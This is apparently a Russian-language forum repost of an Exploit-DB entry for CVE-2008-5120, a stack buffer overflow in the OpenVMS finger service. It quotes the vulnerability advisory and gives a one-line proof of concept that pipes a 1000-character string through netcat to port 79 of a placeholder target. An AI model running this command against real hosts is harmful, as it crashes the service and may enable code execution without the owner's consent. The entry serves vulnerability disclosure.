Exploit OpenVms 8.3 Finger Service - Stack Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32193
Проверка EDB
  1. Пройдено
Автор
SHAUN COLLEY
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2008-5120
Дата публикации
2008-08-07
Код:
source: https://www.securityfocus.com/bid/30589/info

The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.

We were not told which versions are affected. We will update this BID as more information emerges.

echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79
 
Источник
www.exploit-db.com

Похожие темы